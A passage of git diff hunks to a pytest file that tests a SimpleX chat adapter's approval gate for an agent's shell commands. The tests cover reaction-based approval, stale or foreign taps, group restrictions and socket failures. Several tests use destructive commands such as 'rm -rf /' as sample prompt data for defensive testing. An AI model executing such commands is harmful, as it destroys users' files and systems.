+    assert sent == []  # never touched /_send or /_reaction
+    frame = json.loads(adapter._ws.send.call_args[0][0])
+    assert frame["cmd"].startswith("@alice ")
+    assert "tap a reaction" not in frame["cmd"]
+    assert "/approve" in frame["cmd"]
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_degrades_when_daemon_rejects_reactions():
+    """A daemon that refuses reactions leaves the typed flow, not a broken one."""
+    adapter, sent = _approval_adapter(
+        reaction_response={"type": "chatCmdError", "chatError": {}}
+    )
+
+    first = await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/a", session_key="s1", description="delete"
+    )
+    await _drain(adapter)
+
+    assert first.success is True
+    assert adapter._reactions_supported is False
+    # Exactly one attempt, then it stops trying.
+    assert len(_reaction_commands(sent)) == 1
+    notice = json.loads(adapter._ws.send.call_args[0][0])["cmd"]
+    assert "/approve" in notice
+
+    sent.clear()
+    adapter._ws.send.reset_mock()
+    second = await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/b", session_key="s2", description="delete"
+    )
+    await _drain(adapter)
+
+    assert second.success is True
+    # No anchoring send, no reaction attempts — just the plain text prompt.
+    assert sent == []
+    second_prompt = json.loads(adapter._ws.send.call_args[0][0])["cmd"]
+    assert "tap a reaction" not in second_prompt
+    assert "/approve" in second_prompt
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_reports_failure_when_daemon_rejects_the_send():
+    """A rejected prompt send must fail so run.py falls back to plain text."""
+    adapter = _adapter_with_ws()
+
+    async def fake_send_command(command, timeout=30.0):
+        return {"type": "chatCmdError", "chatError": {}}
+
+    adapter._send_command = fake_send_command
+    result = await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /", session_key="s", description="delete"
+    )
+    assert result.success is False
+
+
+@pytest.mark.asyncio
+async def test_reaction_resolves_pending_approval(resolved_approvals):
+    calls, _state = resolved_approvals
+    adapter, sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="simplex:42",
+        description="delete",
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("✅"))
+    await _drain(adapter)
+
+    assert calls == [("simplex:42", "once")]
+    # State is retired and the bot's own seeds are toggled back off.
+    assert adapter._approval_prompts_by_item == {}
+    assert adapter._approval_prompt_by_session == {}
+    assert len(_reaction_commands(sent, toggle="off")) == len(_choice_table())
+
+
+@pytest.mark.asyncio
+async def test_reaction_variation_selector_is_normalized(resolved_approvals):
+    """❤ arrives with and without U+FE0F depending on the client."""
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("❤️"))
+    assert calls == [("s", "always")]
+
+
+@pytest.mark.asyncio
+async def test_thumbs_up_is_accepted_as_approve_once(resolved_approvals):
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("👍"))
+    assert calls == [("s", "once")]
+
+
+@pytest.mark.asyncio
+async def test_own_seed_echo_does_not_resolve(resolved_approvals):
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("✅", dir_type="directSnd"))
+    assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_removing_a_reaction_does_not_resolve(resolved_approvals):
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("✅", added=False))
+    assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_reaction_from_another_contact_is_ignored(resolved_approvals):
+    """Fail closed: only the contact whose DM raised the approval may answer."""
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("✅", contact_id=99))
+    assert calls == []
+    assert adapter._approval_prompts_by_item  # still pending
+
+
+@pytest.mark.asyncio
+async def test_group_reaction_requires_the_allowlist(monkeypatch, resolved_approvals):
+    calls, _state = resolved_approvals
+    monkeypatch.setenv("SIMPLEX_GROUP_ALLOWED", "7")
+    monkeypatch.setenv("SIMPLEX_ALLOWED_USERS", "member-a")
+    adapter, sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="group:7", command="rm -rf /tmp/x", session_key="s",
+        description="delete",
+    )
+    await _drain(adapter)
+    assert _reaction_commands(sent)[0].startswith("/_reaction #7 501 on ")
+
+    outsider = _reaction_event(
+        "✅", dir_type="groupRcv",
+        member={"memberId": "member-b", "localDisplayName": "mallory"},
+    )
+    await adapter._handle_event(outsider)
+    assert calls == []
+
+    insider = _reaction_event(
+        "✅", dir_type="groupRcv",
+        member={"memberId": "member-a", "localDisplayName": "alice"},
+    )
+    await adapter._handle_event(insider)
+    await _drain(adapter)
+    assert calls == [("s", "once")]
+
+
+@pytest.mark.asyncio
+async def test_unmapped_reaction_explains_itself_once(resolved_approvals):
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+    adapter._ws.send.reset_mock()
+
+    await adapter._handle_event(_reaction_event("😂"))
+    await adapter._handle_event(_reaction_event("😢"))
+
+    assert calls == []
+    # One explanatory reply, not one per stray reaction.
+    assert adapter._ws.send.call_count == 1
+
+
+@pytest.mark.asyncio
+async def test_stale_tap_is_told_the_command_did_not_run(resolved_approvals):
+    """resolve returning 0 means the queue was already drained (#63501)."""
+    calls, state = resolved_approvals
+    state["count"] = 0
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+    adapter._ws.send.reset_mock()
+
+    await adapter._handle_event(_reaction_event("✅"))
+    await _drain(adapter)
+
+    assert calls == [("s", "once")]
+    reply = json.loads(adapter._ws.send.call_args[0][0])["cmd"]
+    assert "no longer pending" in reply
+    assert "Approved" not in reply
+
+
+@pytest.mark.asyncio
+async def test_expired_prompt_is_retired_without_resolving(resolved_approvals):
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+    adapter._approval_prompts_by_item["501"].expires_at = 0.0
+    adapter._ws.send.reset_mock()
+
+    await adapter._handle_event(_reaction_event("✅"))
+    await _drain(adapter)
+
+    assert calls == []
+    assert adapter._approval_prompts_by_item == {}
+    assert "expired" in json.loads(adapter._ws.send.call_args[0][0])["cmd"]
+
+
+@pytest.mark.asyncio
+async def test_new_prompt_for_a_session_evicts_the_previous_one():
+    """Single-flight per session, same as the Matrix adapter."""
+    adapter, _sent = _approval_adapter(item_id=501)
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/a", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    adapter2, _s2 = _approval_adapter(item_id=777)
+    adapter._send_command = adapter2._send_command
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/b", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    assert list(adapter._approval_prompts_by_item) == ["777"]
+    assert adapter._approval_prompt_by_session == {"s": "777"}

--- a/tests/gateway/test_simplex_plugin.py
+++ b/tests/gateway/test_simplex_plugin.py
@@ -410,7 +410,7 @@ def _approval_adapter(reaction_response=None, item_id=501, reject_emoji=None):
     sent = []
     timeouts = {}
 
-    async def fake_send_command(command, timeout=30.0):
+    async def fake_send_command(command, timeout=30.0, **_kwargs):
         sent.append(command)
         timeouts[command.split(" ", 1)[0]] = timeout
         if command.startswith("/_send "):
@@ -654,7 +654,7 @@ async def test_exec_approval_reports_failure_when_daemon_rejects_the_send():
     """A rejected prompt send must fail so run.py falls back to plain text."""
     adapter = _adapter_with_ws()
 
-    async def fake_send_command(command, timeout=30.0):
+    async def fake_send_command(command, timeout=30.0, **_kwargs):
         return {"type": "chatCmdError", "chatError": {}}
 
     adapter._send_command = fake_send_command
@@ -843,6 +843,118 @@ async def test_tap_on_a_withdrawn_prompt_resolves_nothing(resolved_approvals):
     await _drain(adapter)
 
     assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_a_prompt_lost_to_a_dead_socket_keeps_the_session_typed_only(
+    resolved_approvals,
+):
+    """A prompt the user never saw still holds the session to typing.
+
+    ``tools/approval`` queues the approval before it notifies the adapter, so
+    a send that never leaves the process leaves command A pending in core with
+    no message of its own. If the socket then recovers and command B pends in
+    the same session, an unguarded adapter sees an empty prompt map, offers
+    the tap lane for B, and a tap resolves the FIFO head — A, which the user
+    never read.
+    """
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+
+    # A: WebSocket down. Nothing is sent, nothing is registered — but core
+    # has already queued it and will hold it for the approval window.
+    live_ws, adapter._ws = adapter._ws, None
+    result = await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/unseen-A", session_key="s",
+        description="create A",
+    )
+    assert result.success is False
+
+    # The inner reconnect loop restores the socket without touching state.
+    adapter._ws = live_ws
+
+    # B: same session, and this one the user actually reads.
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/seen-B", session_key="s",
+        description="create B",
+    )
+    await _drain(adapter)
+
+    assert adapter._approval_prompts_by_item == {}
+    prompt_b = [t for t in _ws_texts(adapter) if "seen-B" in t]
+    assert len(prompt_b) == 1
+    assert "tap a reaction" not in prompt_b[0]
+    assert "/approve" in prompt_b[0]
+
+    # ...so a tap on B cannot run A.
+    await adapter._handle_event(_reaction_event("✅", item_id=501))
+    await _drain(adapter)
+    assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_an_unanchored_prompt_keeps_the_session_typed_only(resolved_approvals):
+    """An anchored send that timed out registers nothing — same hole.
+
+    The message may well have been delivered, so this path reports success,
+    but no item id came back and no prompt is tracked. Command A stays queued
+    in core and invisible to the single-prompt guard.
+    """
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    daemon = adapter._send_command
+    slow = {"send": True}
+
+    async def flaky_send_command(command, timeout=30.0, **kwargs):
+        if slow["send"] and command.startswith("/_send "):
+            return None  # daemon slower than the anchored-send budget
+        return await daemon(command, timeout=timeout, **kwargs)
+
+    adapter._send_command = flaky_send_command
+
+    result = await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/unanchored-A", session_key="s",
+        description="create A",
+    )
+    assert result.success is True
+    assert adapter._approval_prompts_by_item == {}
+
+    slow["send"] = False
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/seen-B", session_key="s",
+        description="create B",
+    )
+    await _drain(adapter)
+
+    assert adapter._approval_prompts_by_item == {}
+    prompt_b = [t for t in _ws_texts(adapter) if "seen-B" in t]
+    assert len(prompt_b) == 1
+    assert "tap a reaction" not in prompt_b[0]
+
+    await adapter._handle_event(_reaction_event("✅", item_id=501))
+    await _drain(adapter)
+    assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_a_send_that_raised_is_not_reported_as_delivered():
+    """A write that raised delivered nothing, and must not claim otherwise.
+
+    ``_send_command`` returns ``None`` for a reply timeout *and* for a failed
+    write; only the first means "possibly delivered". Conflating them told
+    ``run.py`` the prompt was out — suppressing its plain-text fallback — for
+    a message that never reached the socket.
+    """
+    adapter = _adapter_with_ws()
+    adapter._ws.send = AsyncMock(side_effect=ConnectionResetError("socket died"))
+
+    result = await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /", session_key="s", description="delete"
+    )
+
+    assert result.success is False
+    assert adapter._approval_prompts_by_item == {}
+    assert adapter._typed_only_sessions.get("s", 0.0) > time.monotonic()
 
 
 @pytest.mark.asyncio

--- a/tests/gateway/test_simplex_plugin.py
+++ b/tests/gateway/test_simplex_plugin.py
@@ -842,6 +842,76 @@ async def test_second_approval_in_a_session_is_typed_only():
     assert adapter._approval_prompts_by_item == {}
 
 
+async def _two_simultaneous_prompts_one_session(adapter):
+    """Interleave two calls at the awaited prompt send, then let both finish.
+
+    Both calls pass the single-live-prompt check before either registers —
+    the sequential guard cannot see an in-flight peer. Returns the two
+    SendResults.
+    """
+    real = adapter._send_anchored_text
+    gate = asyncio.Event()
+
+    async def gated(chat_ref, text):
+        await gate.wait()
+        return await real(chat_ref, text)
+
+    adapter._send_anchored_text = gated
+
+    first = asyncio.ensure_future(
+        adapter.send_exec_approval(
+            chat_id="42", command="touch /tmp/race-A", session_key="s",
+            description="create A",
+        )
+    )
+    await asyncio.sleep(0)  # first is parked inside the gated send
+    second = asyncio.ensure_future(
+        adapter.send_exec_approval(
+            chat_id="42", command="touch /tmp/race-B", session_key="s",
+            description="create B",
+        )
+    )
+    await asyncio.sleep(0)  # second enters, sees the in-flight peer
+    gate.set()
+    results = await asyncio.gather(first, second)
+    await _drain(adapter)
+    return results
+
+
+@pytest.mark.asyncio
+async def test_simultaneous_approvals_in_one_session_hold_the_typed_lane():
+    """Two calls interleaved at the prompt send must end with zero tap lanes.
+
+    The later entrant takes the typed lane; the earlier one withdraws its
+    own prompt when it resumes and finds the queue grew under it. A tap on
+    either message must have nothing left to answer.
+    """
+    adapter, sent = _approval_adapter()
+    results = await _two_simultaneous_prompts_one_session(adapter)
+
+    assert all(r.success for r in results)
+    # No live tap prompt survived, and the session is latched typed.
+    assert adapter._approval_prompts_by_item == {}
+    assert adapter._typed_only_sessions.get("s", 0.0) > time.monotonic()
+    # The overlapped prompt went out typed — instructions intact, no legend.
+    second_texts = [t for t in _ws_texts(adapter) if "race-B" in t]
+    assert len(second_texts) == 1
+    assert "tap a reaction" not in second_texts[0]
+    assert "/approve" in second_texts[0]
+    # The first prompt was withdrawn, and said so.
+    assert "superseded" in "\n".join(_ws_texts(adapter))
+
+
+@pytest.mark.asyncio
+async def test_overlap_bookkeeping_drains_when_both_calls_return():
+    """The in-flight maps must not leak entries once every call is done."""
+    adapter, _sent = _approval_adapter()
+    await _two_simultaneous_prompts_one_session(adapter)
+
+    assert adapter._approval_inflight == {}
+    assert adapter._approval_entry_gen == {}
+
+
 @pytest.mark.asyncio
 async def test_a_session_that_piled_up_stays_typed_until_the_window_lapses():
     """The third prompt must not get a tap lane back.

--- a/tests/gateway/test_simplex_plugin.py
+++ b/tests/gateway/test_simplex_plugin.py
@@ -9,6 +9,7 @@ from __future__ import annotations
 
 import asyncio
 import json
+import time
 from unittest.mock import AsyncMock, MagicMock
 
 import pytest
@@ -397,35 +398,44 @@ def _choice_table():
     return _simplex._APPROVAL_CHOICES
 
 
-def _approval_adapter(reaction_response=None, item_id=501):
+def _approval_adapter(reaction_response=None, item_id=501, reject_emoji=None):
     """Adapter plus a fake daemon that records every command it is sent.
 
     ``/_send`` answers with a ``newChatItems`` reply carrying *item_id* so
     the approval prompt has an anchor; ``/_reaction`` answers with
-    *reaction_response* (default: accepted).
+    *reaction_response* (default: accepted), or with a command error for the
+    single emoji named in *reject_emoji*.
     """
     adapter = _adapter_with_ws()
     sent = []
+    timeouts = {}
 
     async def fake_send_command(command, timeout=30.0):
         sent.append(command)
+        timeouts[command.split(" ", 1)[0]] = timeout
         if command.startswith("/_send "):
             return {
                 "type": "newChatItems",
                 "chatItems": [
                     {
                         "chatInfo": {"type": "direct"},
-                        "chatItem": {"meta": {"itemId": item_id}},
+                        "chatItem": {"meta": {"itemId": adapter._next_item_id}},
                     }
                 ],
             }
         if command.startswith("/_reaction "):
+            if reject_emoji is not None and f'"{reject_emoji}"' in command:
+                return {"type": "chatCmdError", "chatError": {}}
             if reaction_response is not None:
                 return reaction_response
             return {"type": "chatItemReaction", "added": True}
         return None
 
     adapter._send_command = fake_send_command
+    adapter._command_timeouts = timeouts
+    # Tests that send a second prompt bump this so the fake daemon hands back
+    # a fresh chat-item id, the way a real one would.
+    adapter._next_item_id = item_id
     return adapter, sent
 
 
@@ -444,6 +454,14 @@ def _prompt_text(sent):
     assert send_cmds, "no /_send command was recorded"
     composed = json.loads(send_cmds[-1].split(" json ", 1)[1])
     return composed[0]["msgContent"]["text"]
+
+
+def _ws_texts(adapter):
+    """Every plain (non-anchored) message the adapter pushed at the socket."""
+    return [
+        json.loads(call[0][0])["cmd"]
+        for call in adapter._ws.send.call_args_list
+    ]
 
 
 def _reaction_commands(sent, toggle="on"):
@@ -465,23 +483,26 @@ def _reaction_event(
     dir_type="directRcv",
     contact_id=42,
     member=None,
+    chat_info=None,
 ):
     """A daemon ``chatItemReaction`` event in the documented ACIReaction shape."""
     chat_dir = {"type": dir_type}
     if member is not None:
         chat_dir["groupMember"] = member
+    if chat_info is None:
+        chat_info = {
+            "type": "direct",
+            "contact": {
+                "contactId": contact_id,
+                "localDisplayName": "tester",
+            },
+        }
     return {
         "resp": {
             "type": "chatItemReaction",
             "added": added,
             "reaction": {
-                "chatInfo": {
-                    "type": "direct",
-                    "contact": {
-                        "contactId": contact_id,
-                        "localDisplayName": "tester",
-                    },
-                },
+                "chatInfo": chat_info,
                 "chatReaction": {
                     "chatDir": chat_dir,
                     "chatItem": {"meta": {"itemId": item_id}},
@@ -542,11 +563,10 @@ async def test_exec_approval_anchors_prompt_and_seeds_reactions():
 
 @pytest.mark.asyncio
 async def test_exec_approval_legend_matches_seeded_emoji():
-    """Every advertised reaction is one the bot actually placed.
+    """Every advertised reaction is one the bot tried to place.
 
-    Matrix advertises ❎ for deny but seeds ❌; users are told to use an
-    emoji that is not there. Generating both from one table makes that
-    class of drift unrepresentable, and this asserts it.
+    Generating the legend text and the seed set from one table is what keeps
+    them from drifting apart.
     """
     adapter, sent = _approval_adapter()
     await adapter.send_exec_approval(
@@ -615,37 +635,18 @@ async def test_exec_approval_text_only_when_chat_id_is_a_display_name():
 
 
 @pytest.mark.asyncio
-async def test_exec_approval_degrades_when_daemon_rejects_reactions():
-    """A daemon that refuses reactions leaves the typed flow, not a broken one."""
-    adapter, sent = _approval_adapter(
-        reaction_response={"type": "chatCmdError", "chatError": {}}
-    )
-
-    first = await adapter.send_exec_approval(
-        chat_id="42", command="rm -rf /tmp/a", session_key="s1", description="delete"
+async def test_typed_only_prompt_still_lists_every_offered_tier():
+    """Losing the tap lane must not lose the session/permanent instructions."""
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="alice", command="rm -rf /", session_key="s", description="delete"
     )
     await _drain(adapter)
 
-    assert first.success is True
-    assert adapter._reactions_supported is False
-    # Exactly one attempt, then it stops trying.
-    assert len(_reaction_commands(sent)) == 1
-    notice = json.loads(adapter._ws.send.call_args[0][0])["cmd"]
-    assert "/approve" in notice
-
-    sent.clear()
-    adapter._ws.send.reset_mock()
-    second = await adapter.send_exec_approval(
-        chat_id="42", command="rm -rf /tmp/b", session_key="s2", description="delete"
-    )
-    await _drain(adapter)
-
-    assert second.success is True
-    # No anchoring send, no reaction attempts — just the plain text prompt.
-    assert sent == []
-    second_prompt = json.loads(adapter._ws.send.call_args[0][0])["cmd"]
-    assert "tap a reaction" not in second_prompt
-    assert "/approve" in second_prompt
+    prompt = _ws_texts(adapter)[0]
+    assert "approve session" in prompt
+    assert "approve always" in prompt
+    assert "tap a reaction" not in prompt
 
 
 @pytest.mark.asyncio
@@ -661,6 +662,358 @@ async def test_exec_approval_reports_failure_when_daemon_rejects_the_send():
         chat_id="42", command="rm -rf /", session_key="s", description="delete"
     )
     assert result.success is False
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_fails_when_the_websocket_is_down():
+    """A prompt that was never sent must not be reported as delivered.
+
+    ``run.py`` suppresses its own plain-text fallback on success, so
+    answering "delivered" for a send that never left the process means the
+    user sees no approval prompt at all — a security gate that silently
+    disappears.
+    """
+    from gateway.config import PlatformConfig
+    cfg = PlatformConfig(enabled=True, extra={"ws_url": "ws://localhost:5225"})
+    adapter = SimplexAdapter(cfg)
+    assert adapter._ws is None
+
+    result = await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /", session_key="s", description="delete"
+    )
+    assert result.success is False
+
+
+@pytest.mark.asyncio
+async def test_anchored_send_leaves_headroom_under_the_caller_budget():
+    """gateway/run.py abandons send_exec_approval after 15s.
+
+    Waiting the full 15 here means a slow daemon produces two approval
+    prompts for one command.
+    """
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    assert adapter._command_timeouts["/_send"] < 15.0
+
+
+@pytest.mark.asyncio
+async def test_prompt_window_follows_the_configured_approval_timeout(monkeypatch):
+    """The tap window is the operator's approvals.timeout, not a constant."""
+    import tools.approval as approval_mod
+
+    monkeypatch.setattr(approval_mod, "_get_approval_timeout", lambda: 900)
+
+    adapter, _sent = _approval_adapter()
+    before = time.monotonic()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    prompt = adapter._approval_prompts_by_item["501"]
+    assert prompt.expires_at - before == pytest.approx(900, abs=5)
+
+
+@pytest.mark.asyncio
+async def test_expired_prompts_are_swept_when_the_next_prompt_is_sent():
+    """Prompts nobody ever answered must not accumulate for the process life."""
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/a", session_key="s1", description="delete"
+    )
+    await _drain(adapter)
+    adapter._approval_prompts_by_item["501"].expires_at = 0.0
+
+    adapter._next_item_id = 777
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/b", session_key="s2", description="delete"
+    )
+    await _drain(adapter)
+
+    assert list(adapter._approval_prompts_by_item) == ["777"]
+    assert "s1" not in adapter._approval_prompt_by_session
+
+
+# ---------------------------------------------------------------------------
+# 11a. One live prompt per session — the tap must be unambiguous
+# ---------------------------------------------------------------------------
+
+
+async def _two_prompts_one_session(adapter, sent):
+    """Send prompt A (item 501), then prompt B in the same session."""
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/live-A", session_key="s",
+        description="create A",
+    )
+    await _drain(adapter)
+    adapter._ws.send.reset_mock()
+
+    adapter._next_item_id = 777
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/live-B", session_key="s",
+        description="create B",
+    )
+    await _drain(adapter)
+
+
+@pytest.mark.asyncio
+async def test_second_approval_withdraws_the_first_prompt():
+    """The superseded message must stop looking answerable, and say so.
+
+    ``resolve_gateway_approval`` is FIFO per session (upstream #64001): a tap
+    cannot name a queue entry. Leaving the old message decorated with four
+    live-looking emoji is what turns that into a wrong-command execution.
+    """
+    adapter, sent = _approval_adapter()
+    await _two_prompts_one_session(adapter, sent)
+
+    first = [c for c in _reaction_commands(sent, toggle="off") if " 501 " in c]
+    assert len(first) == len(_choice_table())  # every seed taken back off
+    assert adapter._approval_prompts_by_item == {}
+
+    notice = "\n".join(_ws_texts(adapter))
+    assert "superseded" in notice
+    assert "/approve" in notice
+
+
+@pytest.mark.asyncio
+async def test_second_approval_in_a_session_is_typed_only():
+    """With two approvals pending, neither one may offer a tap."""
+    adapter, sent = _approval_adapter()
+    await _two_prompts_one_session(adapter, sent)
+
+    # The second prompt went out as an ordinary message, not an anchored one.
+    assert [c for c in sent if c.startswith("/_send ")] == [
+        c for c in sent if c.startswith("/_send @42 json ") and "live-A" in c
+    ]
+    second = [t for t in _ws_texts(adapter) if "live-B" in t]
+    assert len(second) == 1
+    assert "tap a reaction" not in second[0]
+    assert "/approve" in second[0]
+    assert adapter._approval_prompts_by_item == {}
+
+
+@pytest.mark.asyncio
+async def test_a_session_that_piled_up_stays_typed_until_the_window_lapses():
+    """The third prompt must not get a tap lane back.
+
+    Answering by typing is invisible to this adapter, so after a pile-up the
+    prompt map goes empty while two unanswered commands are still queued in
+    core. Offering a tap on a third prompt would run the oldest of them.
+    """
+    adapter, sent = _approval_adapter()
+    await _two_prompts_one_session(adapter, sent)
+
+    adapter._next_item_id = 888
+    adapter._ws.send.reset_mock()
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/live-C", session_key="s",
+        description="create C",
+    )
+    await _drain(adapter)
+
+    assert adapter._approval_prompts_by_item == {}
+    third = [t for t in _ws_texts(adapter) if "live-C" in t]
+    assert len(third) == 1
+    assert "tap a reaction" not in third[0]
+
+    # ...and it comes back once the window has lapsed.
+    adapter._typed_only_sessions["s"] = 0.0
+    adapter._next_item_id = 999
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/live-D", session_key="s",
+        description="create D",
+    )
+    await _drain(adapter)
+    assert list(adapter._approval_prompts_by_item) == ["999"]
+
+
+@pytest.mark.asyncio
+async def test_tap_on_a_withdrawn_prompt_resolves_nothing(resolved_approvals):
+    """The whole point of the guard: a stale tap cannot execute anything."""
+    calls, _state = resolved_approvals
+    adapter, sent = _approval_adapter()
+    await _two_prompts_one_session(adapter, sent)
+
+    await adapter._handle_event(_reaction_event("✅", item_id=501))
+    await _drain(adapter)
+
+    assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_a_typed_fallback_still_withdraws_the_live_prompt(resolved_approvals):
+    """The guard runs before every return, not just the happy path.
+
+    A second approval that falls back to plain text for any reason used to
+    leave the first message tappable, and a tap on it resolved the *newer*
+    command — the queue is FIFO and the tap carries no id.
+    """
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/live-A", session_key="s",
+        description="create A",
+    )
+    await _drain(adapter)
+
+    # Daemon stops accepting the bot's own reactions between the two prompts.
+    adapter._reactions_supported = False
+    await adapter.send_exec_approval(
+        chat_id="42", command="touch /tmp/live-B", session_key="s",
+        description="create B",
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("✅", item_id=501))
+    await _drain(adapter)
+
+    assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_a_prompt_that_is_not_the_session_current_one_is_refused(
+    resolved_approvals,
+):
+    """Belt-and-braces currency check, independent of the send-side guard."""
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+    adapter._approval_prompt_by_session["s"] = "999"
+    adapter._ws.send.reset_mock()
+
+    await adapter._handle_event(_reaction_event("✅"))
+    await _drain(adapter)
+
+    assert calls == []
+    assert "no longer pending" in "\n".join(_ws_texts(adapter))
+
+
+# ---------------------------------------------------------------------------
+# 11b. Direct chats only
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.asyncio
+async def test_group_approval_never_offers_the_tap_lane():
+    """v1 keeps reactions to DMs; groups get the gateway-authorized typed lane."""
+    adapter, sent = _approval_adapter()
+
+    result = await adapter.send_exec_approval(
+        chat_id="group:7", command="rm -rf /tmp/x", session_key="s",
+        description="delete",
+    )
+    await _drain(adapter)
+
+    assert result.success is True
+    assert sent == []  # no anchoring send, no seeded reactions
+    assert adapter._approval_prompts_by_item == {}
+    prompt = _ws_texts(adapter)[0]
+    assert "tap a reaction" not in prompt
+    assert "/approve" in prompt
+
+
+@pytest.mark.asyncio
+async def test_group_reaction_resolves_nothing(resolved_approvals):
+    """No group prompt is ever registered, so no group tap can resolve one."""
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="group:7", command="rm -rf /tmp/x", session_key="s",
+        description="delete",
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(
+        _reaction_event(
+            "✅",
+            dir_type="groupRcv",
+            member={"memberId": "member-a", "localDisplayName": "alice"},
+            chat_info={"type": "group", "groupInfo": {"groupId": 7}},
+        )
+    )
+    await _drain(adapter)
+
+    assert calls == []
+
+
+@pytest.mark.asyncio
+async def test_group_member_reaction_on_a_dm_prompt_is_ignored(resolved_approvals):
+    """A member id is not a contact id — never let the namespaces collide.
+
+    ``localDisplayName`` is attacker-chosen, and a member id lives in a
+    different namespace from the contact id a DM prompt is keyed on, so a
+    group-directed reaction can never authorize a DM approval.
+    """
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(
+        _reaction_event(
+            "✅",
+            dir_type="groupRcv",
+            member={"memberId": "42", "localDisplayName": "42"},
+        )
+    )
+    await _drain(adapter)
+
+    assert calls == []
+    assert adapter._approval_prompts_by_item  # still pending
+
+
+@pytest.mark.asyncio
+async def test_reaction_from_another_contact_is_ignored(resolved_approvals):
+    """Fail closed: only the contact whose DM raised the approval may answer."""
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(_reaction_event("✅", contact_id=99))
+    assert calls == []
+    assert adapter._approval_prompts_by_item  # still pending
+
+
+@pytest.mark.asyncio
+async def test_reaction_from_another_chat_is_ignored(resolved_approvals):
+    """The event's own chat must match the chat the prompt was posted in."""
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
